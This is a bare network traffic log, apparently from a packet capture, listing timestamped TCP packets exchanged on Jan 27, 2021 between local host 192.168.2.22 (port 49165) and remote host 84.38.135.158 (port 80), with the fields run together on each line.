            Jan 27, 2021 19:12:27.239609003 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239614964 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.239636898 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239646912 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.239670992 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239680052 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.239698887 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239712954 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.239731073 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239737034 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.239758015 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239768982 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.239795923 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239801884 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.239820957 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239835024 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.239856005 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239862919 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.239886999 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239897013 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.239916086 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239924908 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.239943027 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239952087 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.239969969 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.239979982 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240003109 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240011930 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240035057 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240042925 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240066051 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240075111 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240098000 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240107059 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240130901 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240139008 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240161896 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240170956 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240190029 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240199089 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240223885 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240235090 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240257978 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240268946 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240288973 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240297079 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240317106 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240326881 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240350008 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240358114 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240376949 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240387917 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240406036 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240413904 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240437031 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240444899 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240466118 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240474939 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240497112 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240505934 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240525007 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240537882 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240554094 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240566969 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240585089 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240605116 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240612984 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240622044 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240643024 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240650892 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240673065 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240684032 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240705967 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240715981 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240736008 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240746021 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240767002 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240777969 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240802050 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240808964 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240832090 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240839958 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240863085 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240874052 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240897894 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240907907 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240936995 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240943909 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.240968943 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.240979910 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241004944 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241014957 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241038084 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241049051 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241075039 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241085052 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241111040 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241122961 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241146088 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241158009 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241182089 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241194010 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241225004 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241231918 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241256952 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241269112 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241292000 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241302013 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241328001 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241339922 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241365910 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241379023 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241420031 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241460085 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241489887 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241507053 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241524935 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241538048 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241564035 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241588116 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241605043 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241614103 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241643906 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241652012 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241683006 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241693020 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241724968 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241735935 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241764069 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241772890 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241799116 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241811991 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241838932 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241847992 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241874933 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241888046 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241914988 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241928101 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241957903 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.241966009 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.241997004 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242005110 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242036104 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242046118 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242077112 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242084980 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242115021 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242124081 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242155075 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242162943 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242193937 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242211103 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242237091 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242249966 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242280960 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242290974 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242326021 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242335081 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242363930 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242373943 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242399931 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242413998 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242439985 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242453098 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242482901 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242508888 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242533922 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242552042 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242569923 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242599010 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242618084 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242630959 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242656946 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242671013 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242707014 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242716074 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242738962 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242755890 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242784023 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242791891 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242820024 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242827892 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242851019 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242861986 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242883921 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242896080 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242913008 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242923021 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242939949 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242949963 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.242975950 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.242984056 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243007898 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243019104 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243041992 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243065119 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243092060 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243108034 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243129969 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243141890 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243165016 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243189096 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243200064 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243223906 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243248940 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243261099 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243283033 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243309021 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243319035 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243340969 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243364096 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243376970 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243403912 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243428946 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243442059 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243464947 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243488073 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243499041 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243522882 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243550062 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243578911 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243587017 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243608952 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243618965 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243642092 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243669987 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243686914 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243711948 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243736982 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243750095 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243772984 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243798971 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243813038 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243839025 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243864059 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243884087 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243900061 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243921041 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243944883 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.243963957 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.243978977 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244000912 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244018078 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244035006 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244056940 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244074106 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244092941 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244119883 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244147062 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244154930 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244184971 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244191885 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244218111 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244240999 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244254112 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244276047 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244298935 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244316101 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244334936 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244360924 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244375944 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244398117 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244421959 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244436026 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244456053 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244479895 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244496107 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244513035 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244538069 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244550943 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244647026 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244676113 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244693995 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244734049 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244757891 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244774103 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244791985 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244817019 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244832993 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244854927 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244880915 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244894028 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244913101 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244937897 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.244952917 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.244997025 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.245022058 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.245042086 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.245264053 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.245291948 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.245312929 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.245345116 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.245367050 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.245381117 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.245429993 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.245454073 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.245471954 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.245486975 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.245526075 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.255482912 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.312979937 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.315968037 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316020966 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316045046 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316068888 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316092014 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316118956 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316138029 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316165924 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316175938 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316204071 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316225052 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316243887 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316262960 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316282034 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316299915 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316318989 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316338062 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316364050 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316384077 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316400051 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316406965 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316430092 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316454887 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316473007 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316488981 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316513062 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316524982 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316545963 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316570997 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316585064 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316606045 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316631079 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316641092 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316667080 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316694021 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316708088 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316731930 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316750050 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316777945 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316804886 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316812992 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316832066 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316848993 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316874981 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316898108 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316920996 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316946030 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316957951 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316962957 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.316987991 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.316999912 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.317025900 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.317055941 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.317070007 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.317091942 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.317136049 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.317159891 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.317186117 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.317198992 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.317204952 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.317233086 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.317255974 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.317270041 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.317296028 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.317322969 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.317336082 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.317358971 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.317401886 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.317409039 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.317434072 CET804916584.38.135.158192.168.2.22
